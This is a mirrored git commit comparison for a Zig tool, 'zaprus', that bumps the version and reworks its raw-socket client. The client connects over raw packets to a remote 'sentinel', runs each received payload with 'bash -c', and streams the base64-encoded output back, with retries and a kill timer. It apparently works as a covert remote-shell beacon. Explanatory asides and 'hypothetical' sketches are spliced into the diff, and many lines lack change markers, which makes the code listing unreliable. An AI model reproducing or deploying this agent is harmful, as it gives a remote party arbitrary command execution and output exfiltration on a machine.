Mirror of https://git.robbyzambito.me/zaprus (synced 2026-02-04 08:24:52 +00:00)
Compare commits
3 Commits
09152377ed ... 0.1.0
| Author | SHA1 | Date |
|---|---|---|
| | f554e7a3bb | |
| | 19c2b78d1d | |
| | 3c5f34d5c2 | |
@@ -10,7 +10,7 @@
// This is a [Semantic Version](https://semver.org/).
// In a future version of Zig it will be used for package deduplication.
-.version = "0.0.0",
+.version = "0.1.0",
// Together with name, this represents a globally unique package
// identifier. This field is generated by the Zig toolchain when the
@@ -113,10 +113,9 @@ pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
try self.socket.send(full_msg);
var res_buf: [4096]u8 = undefined;

// Ignore response from sentinel, just accept that we got one.
log.debug("Awaiting handshake response", .{});
// Ignore response from sentinel, just accept that we got one.
_ = try self.socket.receive(&res_buf);
try io.sleep(.fromMilliseconds(40), .real);

headers.udp.dst_port = udp_dest_port;
headers.ip.id = rand.int(u16);
@@ -72,10 +72,6 @@ pub fn init() !RawSocket {
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError;

-const timeout: std.os.linux.timeval = .{ .sec = 60 * if (is_debug) 1 else 10, .usec = 0 };
-const timeout_ret = std.os.linux.setsockopt(socket, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
-if (timeout_ret != 0) return error.SetTimeoutError;

return .{
    .fd = socket,
    .sockaddr_ll = sockaddr_ll,
@@ -83,6 +79,12 @@ pub fn init() !RawSocket {
    };
}

+pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
+    const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
+    const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
+    if (timeout_ret != 0) return error.SetTimeoutError;
+}

pub fn deinit(self: *RawSocket) void {
    _ = std.os.linux.close(self.fd);
    self.* = undefined;
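The timeout that init() used to hard-code is the standard SO_RCVTIMEO socket option, now exposed through setTimeout so callers can choose a value per phase. A minimal standalone sketch of the same option on an ordinary UDP socket, using std.posix instead of the raw std.os.linux calls above (hypothetical, not part of this repository):

```zig
const std = @import("std");

pub fn main() !void {
    const posix = std.posix;

    // Any receiving socket works here; a plain UDP socket keeps the sketch short.
    const fd = try posix.socket(posix.AF.INET, posix.SOCK.DGRAM, 0);
    defer posix.close(fd);

    // 5-second receive timeout: blocking reads fail with a timeout error once it elapses.
    const timeout: posix.timeval = .{ .sec = 5, .usec = 0 };
    try posix.setsockopt(fd, posix.SOL.SOCKET, posix.SO.RCVTIMEO, std.mem.asBytes(&timeout));
}
```

The later hunks in src/main.zig use the new method to keep the handshake timeout short and relax it once a connection is established.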
src/main.zig (79 changed lines)
@@ -26,18 +26,15 @@ pub fn main(init: std.process.Init) !void {
const args = try init.minimal.args.toSlice(init.arena.allocator());

if (args.len == 1) {
    std.debug.print("{s}", .{help});
    return;
}

var flags: struct {
    relay: ?[]const u8 = null,
    dest: ?[]const u8 = null,
    connect: ?[]const u8 = null,
} = .{};

{
    if (args.len == 1) {
        flags.connect = "";
    } else {
        var i: usize = 1;
        while (i < args.len) : (i += 1) {
            if (to_option.get(args[i])) |opt| {
@@ -127,8 +124,6 @@ pub fn main(init: std.process.Init) !void {
    return;
}

var retry_seconds: u16 = 12 * if (is_debug) 1 else 10;

var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
var w: Writer = .fixed(&init_con_buf);
try w.print("{b64}", .{flags.connect.?});
@@ -139,19 +134,18 @@ pub fn main(init: std.process.Init) !void {
defer client.deinit();
log.debug("Starting connection", .{});

try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
var connection = client.connect(init.io, w.buffered()) catch {
    try init.io.sleep(.fromSeconds(retry_seconds), .boot);
    log.debug("Connection timed out", .{});
    continue;
};

retry_seconds = 60 * if (is_debug) 1 else 10;

log.debug("Connection started", .{});

next_message: while (true) {
    var res_buf: [2048]u8 = undefined;
    try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
    const next = connection.next(init.io, &res_buf) catch {
        try init.io.sleep(.fromSeconds(retry_seconds), .boot);
        continue :reconnect;
    };
@@ -163,35 +157,59 @@ pub fn main(init: std.process.Init) !void {
        continue;
    };

-   const child = std.process.spawn(init.io, .{
+   var child = std.process.spawn(init.io, .{
        .argv = &.{ "bash", "-c", connection_payload },
        .stdout = .pipe,
-       .stderr = .pipe,
+       .stderr = .ignore,
        .stdin = .ignore,
    }) catch continue;

    var child_stdout: std.ArrayList(u8) = .empty;
    defer child_stdout.deinit(init.gpa);
    var child_stderr: std.ArrayList(u8) = .empty;
    defer child_stderr.deinit(init.gpa);
    var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
    var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);

    child.collectOutput(init.gpa, &child_stdout, &child_stderr, std.math.maxInt(usize)) catch |err| {
        log.debug("Failed to collect output: {t}", .{err});
        continue;
    };
    var is_killed: std.atomic.Value(bool) = .init(false);

    var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
    defer _ = kill_task.cancel(init.io) catch {};

    var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
    var cmd_output: Writer = .fixed(&cmd_output_buf);

    var cmd_output_window_iter = std.mem.window(u8, child_stdout.items, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
    while (cmd_output_window_iter.next()) |chunk| {
    // Maximum of 10 messages of output per command
    for (0..10) |_| {
        cmd_output.end = 0;
        // Unreachable because the cmd_output_buf is twice the size of the chunk.
        cmd_output.print("{b64}", .{chunk}) catch unreachable;

        child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
            error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
            error.EndOfStream => {
                cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
                if (cmd_output.end > 0) {
                    connection.send(init.io, cmd_output.buffered()) catch |e| {
                        log.debug("Failed to send connection chunk: {t}", .{e});
                        continue :next_message;
                    };
                }
                break;
            },
        };
        cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
        connection.send(init.io, cmd_output.buffered()) catch |err| {
            log.debug("Failed to send connection chunk: {t}", .{err});
            continue :next_message;
        };
        try init.io.sleep(.fromMilliseconds(40), .boot);
    } else {
        kill_task.cancel(init.io) catch {};
        killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
            log.debug("Failed to kill process??? {t}", .{err});
            continue :next_message;
        };
    }

    if (!is_killed.load(.monotonic)) {
        _ = child.wait(init.io) catch |err| {
            log.debug("Failed to wait for child: {t}", .{err});
        };
    }
}
}
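The loop above streams each command's stdout in SaprusClient.max_payload_len-sized chunks and base64-encodes every chunk before sending it over the connection. A small standalone sketch of that chunk-and-encode step (hypothetical values, not repository code; it uses std.base64 explicitly instead of the diff's {b64} format specifier):

```zig
const std = @import("std");

pub fn main() !void {
    // Stand-in for SaprusClient.max_payload_len; the real value lives in the client.
    const max_payload_len = 183;
    const output = "pretend this is one long run of command output. " ** 20;

    // Big enough for the base64 form of one full window.
    var encode_buf: [256]u8 = undefined;

    // Walk the output in non-overlapping windows, as std.mem.window does above.
    var it = std.mem.window(u8, output, max_payload_len, max_payload_len);
    while (it.next()) |chunk| {
        const encoded = std.base64.standard.Encoder.encode(&encode_buf, chunk);
        std.debug.print("window of {d} bytes -> {d} base64 bytes\n", .{ chunk.len, encoded.len });
    }
}
```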
@@ -200,6 +218,15 @@ pub fn main(init: std.process.Init) !void {
    unreachable;
}

+fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
+    io.sleep(duration, .boot) catch |err| switch (err) {
+        error.Canceled => return,
+        else => |e| return e,
+    };
+    is_killed.store(true, .monotonic);
+    proc.kill(io);
+}

fn parseDest(in: ?[]const u8) [4]u8 {
    if (in) |dest| {
        if (dest.len <= 4) {
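killProcessAfter coordinates with the main loop through the shared is_killed atomic flag: the watchdog sets it, and the loop skips the extra wait() when it sees the flag. A minimal thread-based illustration of that flag handshake (hypothetical; the repository itself uses std.Io concurrent tasks rather than threads):

```zig
const std = @import("std");

fn watchdog(stop: *std.atomic.Value(bool)) void {
    // Pretend the work ran too long; signal the main flow instead of killing a real child.
    std.Thread.sleep(50 * std.time.ns_per_ms);
    stop.store(true, .monotonic);
}

pub fn main() !void {
    var stop = std.atomic.Value(bool).init(false);
    const t = try std.Thread.spawn(.{}, watchdog, .{&stop});
    defer t.join();

    // Poll the flag the same way the main loop checks is_killed before waiting.
    while (!stop.load(.monotonic)) {
        std.Thread.sleep(10 * std.time.ns_per_ms);
    }
    std.debug.print("watchdog fired, skipping the extra wait\n", .{});
}
```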